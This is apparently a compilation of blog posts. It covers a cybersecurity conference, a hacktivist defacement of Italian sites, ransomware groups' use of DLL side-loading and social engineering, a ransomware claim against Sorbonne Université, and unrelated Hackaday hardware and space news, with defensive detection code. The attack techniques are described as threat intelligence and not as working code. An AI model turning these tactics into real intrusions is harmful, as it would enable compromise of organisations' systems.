The hands-on workshops, organised again this year with the support of Accenture, will be the beating heart of the day: first we will explain to the students how something is done, then we will give them the chance to do it themselves on their own laptops. This practical, interactive approach is designed to stimulate interest in the world of technology and cybersecurity and to offer a unique opportunity to get hands-on with the technology.
The Boston Dynamics SPOT robot dog inside the “hands-on” Workshops at the Red Hot Cyber Conference 2024
We invite middle school, high school and university students to register for the conference, so that they can enjoy a concrete and immersive learning experience.

But the first day will not be only about training: this year too, the Capture The Flag (CTF) will be held, a competition for ethical hackers from all over Italy. Participants will compete in a series of practical challenges in cybersecurity, ethical hacking and problem-solving, accumulating points to climb the leaderboard and win the challenge.

A CTF is a cybersecurity competition in which participants must solve security challenges to find and “capture” flags, that is, codes hidden within various digital scenarios. The RHC CTF will take place in a safe and controlled environment, offering young hackers the opportunity to test their skills, learn new techniques and measure themselves against other enthusiasts in the field.


Capture The Flag (CTF) at the Red Hot Cyber Conference 2024

A Second Day Devoted to the Conference


While the first day will focus on young people and practical training, the second day of the Red Hot Cyber Conference 2025 will be devoted exclusively to the conference, with a series of high-level talks entirely in Italian.

Esperti di sicurezza informatica, information technology e innovazione digitale si alterneranno sul palco con interventi di eccezione, affrontando temi come l’hacking, l’intelligenza artificiale applicata alla cybersecurity, la sicurezza del cloud e delle infrastrutture critiche, le guerre informatiche, la geopolitica e le strategie di difesa digitale, oltre all’evoluzione del crimine informatico.
Panel alla Red Hot Cyber Conference 2024. Da Sinistra a destr: Dott. Mario Nobile Direttore Generale di AGID, l’agenzia per l’Italia digitale, Dott. Umberto Rosini, Direttore Sistemi Informativi alla Presidenza del Consiglio dei Ministri – Dipartimento della Protezione Civile, Dott. Paolo Galdieri: Avvocato penalista, Cassazionista, è Docente universitario di Diritto penale dell’informatica, Ing. David Cenciotti: Giornalista aerospaziale, ex ufficiale dell’AM, ingegnere informatico ed esperto di cybersecurity
La giornata si aprirà con un panel istituzionale di alto livello, in cui esperti giuridici, rappresentanti delle istituzioni e professionisti del settore discuteranno di strategie e normative per la protezione digitale del Paese. Il tema del panel sarà “IL FUTURO DELLA CYBERSICUREZZA IN ITALIA – STRATEGIE PER LA PROSSIMA ERA DIGITALE”, un dibattito cruciale su come l’Italia si sta preparando ad affrontare le nuove minacce cyber, con un focus su regolamentazione, prevenzione e strategie nazionali per rafforzare la sicurezza digitale.

La Red Hot Cyber Conference 2025 sarà un’occasione unica per confrontarsi con i maggiori esperti del settore, approfondire i temi più attuali della sicurezza informatica e comprendere come il nostro Paese può affrontare le sfide digitali del futuro.


A view of the Capture The Flag participants

All This Thanks to Our Sponsors


This event would not be possible without the valuable support of our sponsors. Their collaboration is essential to offer an educational and engaging experience to all participants.

We also thank all our media partners: Fintech Awards, Cyber Actors, Women 4 Cyber, Digital Security Summit, GDPR Day, E-Campus Università, Hackmageddon, CyberSecurityUP, Federazione Italiana Combattenti, Ri-Creazione, Aipsi and RedHotCyber Academy.

We invite all companies interested in supporting the Red Hot Cyber Conference 2025 to contact us for information on the sponsorship packages still available. Your participation will help promote a culture of cybersecurity and train the professionals of the future.

Don't miss the opportunity to be part of this important event in the world of cybersecurity!
Photo gallery captions:
Students filming the hands-on workshop
Students attending the hands-on workshops
Francesco Conti, Luca Vinciguerra and Salvatore Ricciardi of the Red Hot Cyber AI group present the workshop "HOW TO BUILD A FACE RECOGNITION SYSTEM WITH AI"
Andrea Tassotti of CyberSecurityUP presents the workshop "HOW TO HACK AN EXECUTABLE WHILE EVADING APPLICATION CONTROLS"
Students playing the Capture The Flag
A view of the Capture The Flag participants
Audience at the Red Hot Cyber Conference 2024
Boston Dynamics' SPOT entering the Red Hot Cyber Conference 2024
Lunch at the Red Hot Cyber Conference 2024
A view of the CTF participants on the theatre's second staircase
A photo of the full STAFF of the Red Hot Cyber Conference 2024

The article "Two months to the RHC Conference 2025! Thanks to our sponsors for making this event possible!" originally appeared on il blog della sicurezza informatica.


Italian Sites Targeted! The !FAKESITE Defacement and the Dark Side of Hacktivism


In recent days, several Italian websites have been targeted by a defacement attack, a technique used to alter the content of a web page without the owner's consent. The affected sites include:

  • hxxps://viralproduction[.]it/1337.php
  • hxxps://diegolucattini[.]it/1337.php

These attacks were claimed by the group calling itself !FAKESITE, which left its signature on the defaced pages, accompanied by a provocative message and a list of pseudonyms of alleged members of the collective. Below is what the hacktivists posted on the sites:
SIGNED BY FAKESITE | CYBER ERROR SYSTEM

"If you ask me about the vulnerabilities of a system, I have no answer. But what is certain is that the most vulnerable security is that of human beings themselves"

CONTACT ME CLICK HERE

Fakesite - Doys_404 - Anon_lx02 - Fakesec - Iethesia - SukaKamu01 - HanjsXploite - Enter666x - NoFace999 - Lanzz/GregCyber - XybaXploite - RommyXploit - Dandier - Xstroven - BigBoy - Amirxploite - Machfood - Fedup_404 - UniCorn - Izunasec

[ Cyber Error System | Jawa Barat Cyber | TegalXploiter ]
[ Bogor6etar | Hacktivist Of Garuda ]

What Is a Defacement?


Defacing is a form of hacking that consists of altering the content of a website, replacing the home page or adding unauthorized elements. This type of attack can be carried out by exploiting vulnerabilities in web servers or CMSs (Content Management Systems), or through compromised credentials.

Defacements are often carried out for different purposes:

  • Demonstrating a vulnerability: to highlight flaws in a system's security.
  • Political or social messages: in cases of hacktivism, the attackers convey protest messages.
  • Propaganda: some groups use defacing to spread ideologies or to publicize particular causes.
  • Simple vandalism: in some cases the attacks have no specific purpose other than the pleasure of causing damage.


Hacktivism: When Hacking Becomes Protest


Hacktivism is a form of activism that uses computer techniques to promote a political or social cause. Hacktivist groups often attack government, institutional or corporate sites to raise public awareness of particular issues. Some of the best-known groups in this field are Anonymous, Lizard Squad and LulzSec.

In the case of the !FAKESITE group, the message left on the attacked sites suggests an intent closer to cyber vandalism or a show of skill than to a genuine political cause. However, the references to a "Cyber Error System" and to collectives such as "Hacktivist Of Garuda" could point to a link with broader movements in the underground hacking scene.

Implications and Security


Attacks of this kind highlight the importance of adopting adequate security measures to protect websites from unauthorized intrusions. Some fundamental precautions include:

  • Regularly update software and plugins.
  • Use strong passwords and two-factor authentication.
  • Monitor access logs to spot suspicious activity.
  • Deploy firewalls and intrusion detection systems.
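Alongside log monitoring, a file-integrity baseline of the web root is the control that catches a defacement directly: a page such as the 1337.php above appearing where no deployment put it. The following is an added example written for this article, not code from Red Hot Cyber or Recorded Future; the web root, its files and the "defacement" are all constructed inside a temporary directory.

```python
"""Minimal file-integrity check for a web root (added example, constructed demo).

A baseline of SHA-256 hashes is taken after a known-good deployment; a later
snapshot is compared against it and the differences are classified. In
production the baseline lives off-host and the comparison runs on a schedule.
"""
import hashlib
import os
import tempfile

# Extensions whose unexpected appearance in a web root is high severity: the
# server executes them instead of serving them as static content.
EXECUTABLE_EXTENSIONS = {".php", ".phtml", ".php5", ".cgi", ".pl", ".py", ".jsp", ".asp", ".aspx"}


def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Map each file under root (relative, POSIX-style path) to its SHA-256."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            result[rel] = _sha256(full)
    return result


def diff_snapshots(baseline, current):
    """Return (added, modified, removed) relative paths, each sorted."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return added, modified, removed


def classify(added, modified, removed):
    """Turn a diff into (severity, path, reason) findings.

    A new server-side script is treated as a likely web shell or deface page;
    a changed existing page (e.g. index.html) is the classic deface signature.
    """
    findings = []
    for p in added:
        ext = os.path.splitext(p)[1].lower()
        sev = "high" if ext in EXECUTABLE_EXTENSIONS else "medium"
        findings.append((sev, p, "file added outside deployment"))
    for p in modified:
        findings.append(("high", p, "content changed since baseline"))
    for p in removed:
        findings.append(("medium", p, "file removed since baseline"))
    return findings


def demo():
    """Build a constructed web root, baseline it, simulate a defacement, report."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "assets"))
        with open(os.path.join(root, "index.html"), "w") as f:
            f.write("<h1>Welcome</h1>\n")
        with open(os.path.join(root, "assets", "site.css"), "w") as f:
            f.write("body { color: #222; }\n")
        baseline = snapshot(root)

        # Simulated defacement: a new PHP page dropped in, home page overwritten.
        with open(os.path.join(root, "1337.php"), "w") as f:
            f.write("<?php echo 'defaced'; ?>\n")
        with open(os.path.join(root, "index.html"), "w") as f:
            f.write("<h1>hacked</h1>\n")

        findings = classify(*diff_snapshots(baseline, snapshot(root)))
        for sev, path, reason in findings:
            print(f"[{sev}] {path}: {reason}")
        return findings


if __name__ == "__main__":
    demo()
```

Legitimate deployments also change files, so the comparison should run against the baseline taken right after each release, not against an old one.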

Although defacing may seem harmless compared with other, more devastating cyberattacks such as ransomware, it can still cause significant reputational and financial damage to the victims.

It remains to be seen whether the !FAKESITE group will continue with this type of attack or whether its activity will be limited to these isolated episodes. In the meantime, it is essential that website operators strengthen their defences to avoid falling victim to similar incursions.

This article was produced using the Recorded Future platform, a strategic partner of Red Hot Cyber and a leader in cyber threat intelligence, which provides advanced analysis to identify and counter malicious activity in cyberspace.

The article "Italian Sites Targeted! The !FAKESITE Defacement and the Dark Side of Hacktivism" originally appeared on il blog della sicurezza informatica.


Black Basta and Cactus: New Tactics with the BackConnect Malware


In recent months the ransomware groups Black Basta and Cactus have expanded their attack tactics by adding the BackConnect malware to their arsenal. This evolution represents a significant threat to organizations worldwide, combining sophisticated techniques to obtain and maintain unauthorized access to compromised systems.

The evolution of attack tactics


According to an analysis published by Trend Micro, Black Basta and Cactus are using new strategies to compromise corporate systems. The adoption of the BackConnect malware lets the attackers establish persistent connections to infected systems, facilitating data exfiltration and further attacks.

Social engineering techniques for initial access


The attackers make extensive use of social engineering to gain initial access to target systems. One of the most widespread strategies is mass emailing, a genuine email bombardment intended to confuse victims and induce them to open malicious attachments or click harmful links. In addition, they often impersonate IT support, posing as corporate technicians to obtain access credentials.

Another worrying aspect is the abuse of collaboration and remote-assistance tools such as Microsoft Teams and Quick Assist. These tools, essential for work and technical support, are used by the attackers to expand their foothold inside corporate networks, bypassing many traditional defences.

DLL Side-Loading via OneDriveStandaloneUpdater.exe


One of the most insidious techniques adopted by the attackers is the abuse of the OneDriveStandaloneUpdater.exe process to load malicious DLLs, known as DLL side-loading. This method exploits the way Windows resolves DLLs, substituting a legitimate library with a malicious one. In this way the attackers execute malicious code with elevated privileges and secure persistent access to the compromised systems. The process begins by placing a malicious version of the DLL in the same directory as the legitimate executable, so that it is loaded automatically.
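The detectable signature of this technique is a DLL loaded from the host executable's own directory that does not carry a valid Microsoft signature. The block below is an added example written for this article, not code from Trend Micro or the authors: it runs that rule over constructed records shaped like Sysmon Event ID 7 (Image loaded) fields. The sample events, DLL names and paths are constructed, and the list of trusted signers and "suspicious" directories is a deliberately narrow demo heuristic.

```python
"""Detector for the DLL side-loading pattern described above (added example).

Records are dicts with Sysmon Event ID 7 field names (Image, ImageLoaded,
Signed, Signature, SignatureStatus). The sample events are constructed.
"""
import ntpath

# Processes known to be abused as side-loading hosts; the article names this
# one. Extend from your own threat intelligence.
SIDELOAD_HOSTS = {"onedrivestandaloneupdater.exe"}

# Signers accepted for a DLL sitting beside a Microsoft binary (constructed list).
TRUSTED_SIGNERS = {"microsoft corporation", "microsoft windows"}

# Drop locations a genuine updater would not normally run from (constructed heuristic).
SUSPICIOUS_DIRS = ("\\temp\\", "\\downloads\\", "\\public\\", "\\programdata\\")


def is_sideload(event):
    """Return a reason string if the event looks like DLL side-loading, else None."""
    image = event.get("Image", "")
    loaded = event.get("ImageLoaded", "")
    if ntpath.basename(image).lower() not in SIDELOAD_HOSTS:
        return None
    if not loaded.lower().endswith(".dll"):
        return None
    exe_dir = ntpath.dirname(image).lower()
    dll_dir = ntpath.dirname(loaded).lower()
    signed = event.get("Signed", "false").lower() == "true"
    valid = event.get("SignatureStatus", "").lower() == "valid"
    signer = event.get("Signature", "").lower()
    trusted = signed and valid and signer in TRUSTED_SIGNERS

    reasons = []
    # Core pattern: untrusted DLL resolved from the executable's own directory.
    if dll_dir == exe_dir and not trusted:
        reasons.append("untrusted DLL loaded from the executable's own directory")
    # Supporting signal: the "updater" itself runs from a user-writable drop folder.
    if any(s in exe_dir + "\\" for s in SUSPICIOUS_DIRS):
        reasons.append("host executable running from a suspicious directory")
    return "; ".join(reasons) if reasons else None


def scan(events):
    """Return [(UtcTime, ImageLoaded, reason)] for every suspicious event."""
    hits = []
    for ev in events:
        reason = is_sideload(ev)
        if reason:
            hits.append((ev.get("UtcTime", "?"), ev.get("ImageLoaded", "?"), reason))
    return hits


# Constructed sample telemetry, not real events. Record 1 is benign: the
# installed updater loading a Microsoft-signed DLL. Record 2 is the side-load:
# a copy of the executable in a temp folder loading an unsigned DLL placed
# beside it. Record 3 is an unrelated process and must not fire.
SAMPLE_EVENTS = [
    {"UtcTime": "2025-03-09 10:00:01", "EventID": 7,
     "Image": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\example-legit.dll",
     "Signed": "true", "Signature": "Microsoft Corporation", "SignatureStatus": "Valid"},
    {"UtcTime": "2025-03-09 10:02:17", "EventID": 7,
     "Image": r"C:\Users\alice\AppData\Local\Temp\update\OneDriveStandaloneUpdater.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\update\example-sideloaded.dll",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
    {"UtcTime": "2025-03-09 10:03:40", "EventID": 7,
     "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
]


if __name__ == "__main__":
    for when, dll, why in scan(SAMPLE_EVENTS):
        print(f"{when} {dll}: {why}")
```

Many legitimate applications load their own DLLs from their install directory, which is why the rule keys on the signature rather than on the side-by-side load alone.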

Distribution of the BackConnect malware


After gaining access to the target network, the attackers deploy the BackConnect malware. This tool establishes persistent remote connections, giving the attackers a reliable channel through which to control the infected system. Thanks to this technique they evade many traditional signature-based detection solutions and, at the same time, can deliver further malicious payloads, deepening the compromise.

Use of cloud services to distribute malware


To evade security measures and make malicious files harder to identify, the attackers use commercial cloud storage services. By hosting malware on legitimate platforms they distribute it without raising suspicion, bypassing many of the perimeter protections that filter web traffic. Cloud services also let the attackers update the malicious files dynamically, so that they are not quickly identified and removed by security solutions.

Targets and global impact


Since October 2024, most of the attacks carried out with these techniques have occurred in North America and Europe, with the United States among the most affected countries. The main targets have been manufacturing companies, followed by those in the financial and real estate sectors. This type of attack shows a clear strategy on the attackers' part: they tend to target sectors particularly sensitive to data loss and operational disruption.

The integration of BackConnect into the operations of Black Basta and Cactus marks a significant evolution of the ransomware threat. The combined use of social engineering, abuse of legitimate tools, DLL side-loading and cloud services is a complex challenge for companies, which must adopt adequate countermeasures. Deploying advanced detection based on user behaviour and network anomalies becomes essential to counter these threats. It is also essential to invest in staff training to reduce the risk of falling victim to social engineering. Closely monitoring the use of collaboration and remote-assistance tools, with security policies based on the principle of least privilege, can help reduce exposure to these attacks.

As ransomware threats continue to evolve, awareness and the adoption of advanced defence strategies are the best resources for protecting corporate infrastructure from increasingly sophisticated attacks.

The article "Black Basta and Cactus: New Tactics with the BackConnect Malware" originally appeared on il blog della sicurezza informatica.


IPV4, IPV6… Hey! What Happened to IPV5?


If you’ve ever been configuring a router or other network device and noticed that you can set up IPv4 and IPv6, you might have wondered what happened to IPv5. Well, thanks to [Navek], you don’t have to wonder anymore. Just watch the video below.

We will warn you of two things. First, the video takes a long time to get around to what IPv5 was. In addition, if you keep reading, there will be spoilers.

The first part of the video covers the general differences between IPv4 and IPv6, especially surrounding addressing. Then, it talks about how IP alone can’t do things you like to do for handling things like voice. For example, the IP layer doesn’t understand how much bandwidth exists between two points. It is only concerned with moving data from one point to another point.

To foster voice communications, there was a proposal for something called the stream protocol. It didn’t catch on. In fact, it was reincarnated as a proposal to move video, too, but it still didn’t catch on. However, the network header used the next number in sequence, which was… five!

So, really, the video title is a bit of a red herring. You didn’t forget IPv5; there simply was never an IPv5. There is, however, network protocol #5, which has little to do with IP and never caught on.

Still, an interesting walk down memory lane to a time when moving voice and video over the network was exotic high-tech. We love diving into the old network stuff like finger and UUCP.

youtube.com/embed/y-zeYSQdpCE?…


hackaday.com/2025/03/09/ipv4-i…



Clock Mechanism Goes Crazy for Arduino


You’ve doubtless seen those ubiquitous clock modules, especially when setting clocks for daylight savings time. You know the ones: a single AA battery, a wheel to set the time, and two or three hands to show the time. They are cheap and work well enough. But [Playful Technology] wanted to control the hands with an Arduino directly and, in the process, he shows us how these modules work.

If you’ve never studied the inside of these clock modules, you may be surprised about how they actually work. A crystal oscillator pulses a relatively large electromagnet. A small plastic gear has a magnetic ring and sits near the electromagnet.

Each time the polarity of the electromagnet flips, the ring turns 180 degrees to face the opposite magnetic pole to the electromagnet. This turns the attached gear which is meshed with other gears to divide the rotation rate down to once per 24 hours, once per hour, and once per minute. Pretty clever.

That makes it easy to control the hands. You simply detach the electromagnet from the rest of the circuit and control it yourself. The module he used had a mechanical limitation that prevents the hands from moving well at more than about 100 times normal speed.

We wondered how he made the hands reverse and, apparently, there is a way to get the drive gear to move in reverse, but it isn’t always reliable. Of course, you could also replace the drive mechanism with something like an RC servo or other motor and it sounds like he has done this and plans to show it off in another video.

We’ve seen the opposite trick before, too. If you really want an easy-to-control analog clock, try this one.

youtube.com/embed/v142dbmIYq0?…


hackaday.com/2025/03/09/clock-…


Hackaday Links: March 9, 2025


Hackaday Links Column Banner

It’s been a busy week in space news, and very little of it was good. We’ll start with the one winner of the week, Firefly’s Blue Ghost Mission 1, which landed successfully on the Moon’s surface on March 2. The lander is part of NASA’s Commercial Lunar Payload Services program and carries ten scientific payloads, including a GPS/GNSS receiver that successfully tracked signals from Earth-orbiting satellites. All of the scientific payloads have completed their missions, which is good because the lander isn’t designed to withstand the long, cold lunar night only a few days away. The landing makes Firefly the first commercial outfit to successfully soft-land something on the Moon, and being the first at anything is always a big deal.

Slightly less impressive was Intuitive Machines’ attempt at a landing a day later. Their NOVA-C robotic lander Athena managed a somewhat controlled landing, but the spacecraft is lying on its side rather than upright, a surprisingly common failure mode for recent lunar landings. Also in the failure category is the loss of the world’s first private asteroid mining mission, as well as SpaceX Starship test flight 8, which ended in spectacular fashion this week as Starship exploded soon after booster separation. As usual, Scott Manley has the best analysis of the incident, which seemed to involve a fire in the engine bay that led to a rapid loss of thrust from four of its six engines, and sent the spacecraft tumbling before tearing itself apart. The only good news from the flight was the third successful catch of the returning booster by the chopsticks, which just never gets old.

What does get old is stories about printer manufacturers and their anti-consumer hijinks, especially when it involves one of the only manufacturers who wasn’t playing the “buy our consumables or we brick it” game. In addition to just about every other printer maker, Brother now stands accused of sending firmware up to printers that turns off functionality if non-OEM cartridges are used. The accusations come from Louis Rossmann, well-known for his right-to-repair advocacy and, ironically, a long-time proponent of Brother printers as the least likely to be bricked. His accusation that “Brother is now among the rest of them” is based on a pretty small sample of affected users, and a self-selected one at that, so take that with the requisite amount of salt. For their part, Brother denies the claim, stating simply that “Brother firmware updates do not block the use of third-party ink in our machines.” They don’t go much beyond that by way of an explanation of what’s happening to the users reporting problems, other than to say that the users may be confused by the fact that “we like to troubleshoot with Brother Genuine supplies.” What the real story is is anyone’s guess at this point, and the best advice we can offer is either to avoid printers altogether, or just buy the cheapest one you can get and harvest it for parts once the starter cartridges are empty.

If like us you’ve accumulated a large collection of physical media films and TV shows to while away the long dark days of a post-apocalyptic nightmare where Netflix and Hulu are but a distant memory, you might want to rethink your strategy. Some DVD aficionados have found a troubling trend with “DVD rot,” especially with discs manufactured by Warner Brothers Discovery between 2006 and 2008. It’s not clear what’s going on, but it looks like the polycarbonate cover is delaminating from the inner Mylar layer, resulting in cloudy areas that obscure the data. Warner is aware of the problem and will replace defective discs with the same title if possible, or exchange it for a title of like value if the original is no longer available. We’re dismayed that this defect probably includes our beloved Looney Tunes collection, but on the upside, now we have an excuse to sit through forty straight hours of cartoons.

And finally, if you were a NASA rocket engineer in the 1960s, skipping leg day wasn’t an option. That’s because the Saturn V full-stack shake test on the Apollo program was a very hands-on feet-on process. The shake test was performed to make sure nothing was loose on the stack, and that it would be able to withstand not only the shaking induced by those five massive F-1 engines, but also the occasional hurricane that Florida is famous for. To get the rocket shaking, engineers sat on the deck of the gantry with their legs bridging the gap and their feet up against the side of the service module and gave it all they had. Other engineers literally backed them up, to provide something to push against, while another team on the uppermost platform used a rope to play tug-of-war with the command module. They were able to get the stack moving pretty good, with a meter or so of deflection at the escape tower. It does raise the question, though: what would they have done if the test failed?

youtube.com/embed/s0UYNoTPdNs?…


hackaday.com/2025/03/09/hackad…


Deep Drawing with Ultrasonics


Small cylindrical parts are often formed through deep drawing — a process by which a punch forms the finished piece from a flat sheet of metal using a forming die. If it sounds like that stresses the metal, it does. But researchers at Fraunhofer have found a way to reduce friction protecting both the material and the tools that do the forming. The process — known as VibroDraw — uses ultrasonic vibrations at around 500 Hz.

Researchers claim a 20% reduction in friction now, and it may be possible to go even further. With less friction, it is possible to do a deeper draw in a single stage. It also creates less heat, which is good for tool life and prevents the lubricant from overheating. The process has a patent if you want more details. You might need to brush up on your German, though. Unsurprisingly, the vibrations are from a piezoelectric transducer.

Copper is soft enough to use 3D printed dies. We don’t know if this technique would help with that or not. Then there’s hydroforming. If you have any results using ultrasonics with these or any other techniques, be sure to let us know.


hackaday.com/2025/03/09/deep-d…


Old Chromebooks Get Second Life as Video Wall


What would you do with dozens and dozens of outdated Chromebooks that are no longer getting updates from the Google Mothership? It’s a situation that plenty of schools will have to deal with in the near future, and we can only hope that those institutions have students as clever as [Varun Biniwale] and his friend [Aksel Salmi] to lean on — as they managed to recycle ten of these outdated laptops into an impressive video display.

There’s actually two write-ups for this particular story, with [Varun] documenting the modification of the Chromebooks and the software developed to play the video between them, and [Aksel] covering how the hardware was ultimately attached to the wall via bespoke 3D printed mounting brackets.

The general idea with this project was to strip each Chromebook down to just a motherboard and an LCD, stick them on the wall, and then play the same video on all of them at once. This sounds relatively easy, but they quickly found the limited hackability of ChromeOS to be a limiting factor.

So the decision was made to remove the physical write protection screws from each computer, which would allow for the installation of a standard Linux distribution. Once running stock Debian, it took some custom scripts to get each machine to boot up into Chromium and point at the appropriate web page. From there, socket.io is used to synchronize the playback of the carefully prepared video file.

On the other side of the project, [Aksel] shows the logistics of taking the machines apart and getting them ready for their new jig. Initial experiments focused on mounting the hardware to a laser-cut piece of acrylic, which looked good, but simply wasn’t robust enough. In the end, the solution was a highly customized 3D printed mount which holds the motherboard securely while also providing a place to attach each LCD.

End-of-life Chromebooks can be had for pennies on the dollar, and they’ll only become more common with time, so we’re eager to see what folks end up doing with them. Between the hardware and software aspects of this particular hack, we’re sure there’s a trick or two you’ll pick up from this one.

youtube.com/embed/6HSC_Q2xEgI?…


hackaday.com/2025/03/09/old-ch…


Taming the Wobble: An Arduino Self-Balancing Bot


self-stabilizing robot on tabletop

Getting a robot to stand on two wheels without tipping over involves a challenging dance with the laws of physics. Self-balancing robots are a great way to get into control systems, sensor fusion, and embedded programming. This build by [mircemk] shows how to make one with just a few common components, an Arduino, and a bit of patience fine-tuning the PID controller.

At the heart of the bot is the MPU6050 – a combo accelerometer/gyroscope sensor that keeps track of tilt and movement. An Arduino Uno takes this data, runs it through a PID loop, and commands an L298N motor driver to adjust the speed and direction of two DC motors. The power comes from two Li-ion batteries feeding everything with enough juice to keep it upright. The rest of the magic lies in the tuning.

PID (Proportional-Integral-Derivative) control is what makes the robot stay balanced. Kp (proportional gain) determines how aggressively the motors respond to tilting. Kd (derivative gain) dampens oscillations, and Ki (integral gain) helps correct slow drifts. Set them wrong, and your bot either wobbles like a confused penguin or falls flat on its face. A good trick is to start with only Kp, then slowly add Kd and Ki until it stabilizes. Then don’t forget to calibrate your MPU6050; each sensor has unique offsets that need to be compensated in the code.
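To see why the "start with Kp, then add Kd" advice works, here is an added example (not [mircemk]'s code) that runs a discrete PID loop against a linearized inverted-pendulum model: with Kp alone the tilt oscillates without decaying, and adding Kd damps it out. The plant constants A_PLANT and B_PLANT, the 100 Hz loop rate, the initial tilt and the gains are constructed for illustration, not measured from the real robot.

```python
"""Toy balancing-robot simulation for PID tuning (added example, constructed plant).

The tilt angle theta (rad, 0 = upright) obeys theta'' = A*theta + B*u, where
the A term is gravity tipping the bot over and u is the motor command the
controller produces. The derivative term is computed from successive angle
samples, as a sensor-only implementation on the Arduino would do it.
"""

DT = 0.01        # controller period in seconds (100 Hz loop)
A_PLANT = 10.0   # rad/s^2 of angular acceleration per rad of tilt (constructed)
B_PLANT = 5.0    # rad/s^2 of angular acceleration per unit of motor command (constructed)


class PID:
    """Discrete PID with a clamp on the integral term (simple anti-windup)."""

    def __init__(self, kp, ki, kd, dt=DT, i_limit=1.0):
        self.kp, self.ki, self.kd, self.dt, self.i_limit = kp, ki, kd, dt, i_limit
        self.integral = 0.0
        self.prev_error = None

    def update(self, error):
        self.integral = max(-self.i_limit, min(self.i_limit, self.integral + error * self.dt))
        derivative = 0.0 if self.prev_error is None else (error - self.prev_error) / self.dt
        self.prev_error = error
        return self.kp * error + self.ki * self.integral + self.kd * derivative


def simulate(kp, ki, kd, theta0=0.1, seconds=5.0, dt=DT):
    """Return the list of tilt angles (rad) over the run, starting from theta0."""
    pid = PID(kp, ki, kd, dt)
    theta, omega = theta0, 0.0
    history = []
    for _ in range(int(seconds / dt)):
        error = 0.0 - theta                      # setpoint is upright (0 rad)
        u = pid.update(error)
        alpha = A_PLANT * theta + B_PLANT * u    # gravity vs. motor reaction
        omega += alpha * dt                      # semi-implicit Euler step
        theta += omega * dt
        history.append(theta)
    return history


def peak_in_last_second(history, dt=DT):
    """Largest |tilt| during the final second of the run; near 0 means settled."""
    n = int(1.0 / dt)
    return max(abs(t) for t in history[-n:])


if __name__ == "__main__":
    # Kp only: B*Kp exceeds A so the bot no longer falls, but nothing damps the
    # swing and it keeps wobbling. Adding Kd damps it; a small Ki removes bias.
    for gains in [(6.0, 0.0, 0.0), (6.0, 0.0, 1.0), (6.0, 0.5, 1.0)]:
        peak = peak_in_last_second(simulate(*gains))
        print(f"Kp={gains[0]} Ki={gains[1]} Kd={gains[2]}: peak tilt in last second = {peak:.5f} rad")
```

With these constants Kp=6 turns the unstable plant into an undamped oscillator; the Kd term is what actually brings the tilt to rest, which is the behaviour the tuning order above relies on.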

Once dialed in, the result is a robot that looks like it defies gravity. Whether you’re hacking it for fun, turning it into a segway-like ride, or using it as a learning tool, a balancing bot is a great way to sharpen your control system skills. For more inspiration, check out this earlier attempt from 2022, or these self-balancing robots (one with a little work) from a year before that. You can read up on [mircemk]’s project details here.


hackaday.com/2025/03/09/taming…


Sorbonne Université in Funksec's Sights: The Ransomware Group Claims an Attack


The Funksec ransomware group claims an attack on Sorbonne Université in Paris, reporting that it stole 20 GB of sensitive data. According to the information published on their Data Leak Site (DLS), the cybercriminals state that they hold confidential documents, credentials and strategic plans belonging to the university.

At present the truth of these claims cannot be confirmed, as the organization has not yet issued any official statement about the incident. However, Funksec has reportedly set a 12-day ultimatum, threatening to publish the data on 19 March 2025 if a demand, presumably a cryptocurrency ransom, is not met.

Analysis of the post published on Funksec's Data Leak Site


The post published on Funksec's DLS clearly shows the Sorbonne Université logo, accompanied by a claim message.

Analysis of the screenshot reveals some relevant details:

  • The countdown: placed in the top right, it shows the time remaining before the alleged publication of the data. This is a classic pressure tool used by ransomware groups to push the victim to negotiate before the deadline.
  • The description of the attack: Funksec claims to hold confidential information, including credentials and strategic documents. However, there is no concrete evidence to support this statement.
  • The intimidation technique: the text on the DLS suggests that victims search for their own names in the compromised data, a psychological tactic used to amplify anxiety and increase pressure on students, faculty and staff.
  • The group's identity: the "© 2025 Funksec ransomware" mark shows the group's intent to consolidate its reputation in the cybercrime landscape. Its strategy appears aimed at building a recognizable identity, similar to that of better-known groups such as LockBit or BlackCat.


Who Is Funksec? An Emerging Ransomware Group


Funksec is a ransomware group that surfaced publicly at the end of 2024, quickly gaining notoriety through targeted attacks on government and academic institutions. Its members describe themselves as self-taught and appear to collaborate with other cybercriminal groups to refine their offensive techniques and tools. Many of the actors behind FunkSec seem inexperienced, and some of the published information may be recycled from earlier data leaks tied to hacktivist activity, raising doubts about its authenticity.

A key aspect of FunkSec's activity is its strong presence on Breached Forum, one of the main cybercrime discussion platforms. The group has used the forum to promote its operations, share data leaks and gain notoriety.

One of the most active members on Breached Forum is Scorpion, also known as DesertStorm, who promoted FunkSec through a YouTube video in October 2024, although the content was more propaganda than a real demonstration of the group's capabilities. DesertStorm continued to post alleged data leaks on Breached Forum until his account was banned in November 2024. After his exclusion, another actor, El Farado, took on a key role in promoting the group, sharing data leaks and keeping FunkSec's visibility on the forum high.

Discussions on Breached Forum indicate that FunkSec uses a combination of hacktivist and cybercrime tactics. Some members of the group seem to have a background in hacktivist circles, while others are more oriented toward financial gain. Their ransomware, written in Rust and under continuous development, has been promoted directly on Breached Forum with frequent updates on new features. FunkSec has also posted requests for collaboration and additional services, including an alleged "data sorting" system run by a member known as XTN.

Some FunkSec leaks were published on DarkForums by a user named Bjorka, a well-known Indonesian hacktivist. However, there is no definitive evidence that the real Bjorka is involved with FunkSec, and it may be an attempt to exploit that notoriety.

